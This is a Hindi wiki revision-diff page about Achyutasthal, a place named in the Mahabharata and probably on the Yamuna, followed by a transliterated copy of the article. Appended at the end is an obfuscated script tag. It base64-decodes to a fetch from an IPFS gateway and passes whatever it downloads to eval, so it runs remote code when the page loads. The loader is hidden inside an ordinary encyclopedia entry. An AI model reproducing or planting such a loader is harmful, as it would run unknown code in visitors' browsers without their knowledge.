Difference between revisions of "अच्युतस्थल"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:पौराणिक स्थान (को हटा दिया गया हैं।))
 
Line 1: Line 1:
*[[महाभारत]] में उल्लिखित एक स्थान जो संभवत: [[यमुना नदी]] के तट पर स्थित था।  
+
'''अच्युतस्थल''' [[महाभारत]] में उल्लिखित एक स्थान जो संभवत: [[यमुना नदी]] के [[तट]] पर स्थित था।  
*महाभारत<ref>महाभारत [[वन पर्व महाभारत|वन पर्व]] 129, 9</ref> से सूचित होता है कि महाभारत काल में प्रचलित प्राचीन परंपरा में इस स्थान को अपवित्र समझा जाता था- 'युगंधरे दधिप्राश्य उषित्वा चाच्युतस्थलें' आदि।
+
*महाभारत<ref>महाभारत [[वन पर्व महाभारत|वन पर्व]] 129, 9</ref> से सूचित होता है कि महाभारत काल में प्रचलित प्राचीन परंपरा में इस स्थान को अपवित्र समझा जाता था-  
 +
:'युगंधरे दधिप्राश्य उषित्वा चाच्युतस्थलें'  
 
*महाभारत के टीकाकारों ने अच्युतस्थल में वर्णसंकर जातियों का निवास बताया है।
 
*महाभारत के टीकाकारों ने अच्युतस्थल में वर्णसंकर जातियों का निवास बताया है।
  
 
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 07:48, 4 August 2012

achyutasthal mahabharat mean ullikhit ek sthan jo sanbhavat: yamuna nadi ke tat par sthit tha.

  • mahabharat[1] se soochit hota hai ki mahabharat kal mean prachalit prachin paranpara mean is sthan ko apavitr samajha jata tha-
'yugandhare dadhiprashy ushitva chachyutasthalean'
  • mahabharat ke tikakaroan ne achyutasthal mean varnasankar jatiyoan ka nivas bataya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. mahabharat van parv 129, 9

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>